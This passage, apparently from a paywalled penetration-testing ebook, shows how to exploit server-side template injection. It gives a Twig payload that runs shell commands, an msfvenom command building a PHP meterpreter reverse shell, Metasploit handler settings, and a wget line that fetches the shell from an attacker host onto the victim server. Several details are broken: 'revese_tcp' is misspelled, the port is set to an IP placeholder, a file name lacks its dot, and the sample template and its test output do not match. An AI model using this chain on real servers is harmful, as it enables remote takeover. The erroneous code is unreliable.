Exploitation

We've reviewed the underlying problem with template engines. Now, let's check how it's possible to exploit them. See the following code:

var greet = 'Hello $name'; 
<ul> 
<% for(var i=0; i<data.length; i++) 
{%> 
<li><%= data[i] %></li> 
<% } 
%> 
</ul> 
<div> 
<p> Welcome, {{ username }} </p> 
</div> 

In this code, the template engine is waiting for a name in order to show the Welcome string and the name entered. This line will be displayed to the user as a form, looking like this:

To test if it's vulnerable, we'll send a couple of numbers, waiting to be evaluated:

${{1+1}

When the values are sent, the application shows the following:

Hello 2

At this moment, the vulnerability is confirmed. We need to exploit it in order to determine what's the impact. I'll use the payloads developed by James Kettle, from his presentation Server-side Template Injection: RCE for the modern app. Let's insert the next line:

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}

The output will be something like that:

uid=1000(k) gid=1000(k) groups=1000(k),10(wheel)

This means we're able to execute a command in the server and get a response. One recommendation about that is to create a PHP handler using Metasploit to create a payload for directly executing commands using a shell:

  1. Create a PHP web shell using msfvenom, which is a tool created to generate payloads in a dynamic way. To create the PHP web shell, use the following command:
msfvenom -p php/meterpreter/revese_tcp -f raw LHOST=[IP] LPORT=4444 > /var/www/shell.txt
  
  1. After the web shell is created, a handler is needed that'll be receiving the connection. It can be created using the Metasploit framework, which is part of the same project as msfvenom:
use multi/handler
set payload php/meterpreter/reverse_tcp
set lhost [IP]
set lport [IP]
exploit
  1. Now, you just need to enter in the field the following line:
wget http://[IP]/shelltxt

With it, the vulnerable server will execute the wget command to download the shell to the server. When the shell is opened by the template engine, we receive the connection in our handler. Now, we can execute commands directly to the server.

..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.
Reset
18.191.192.241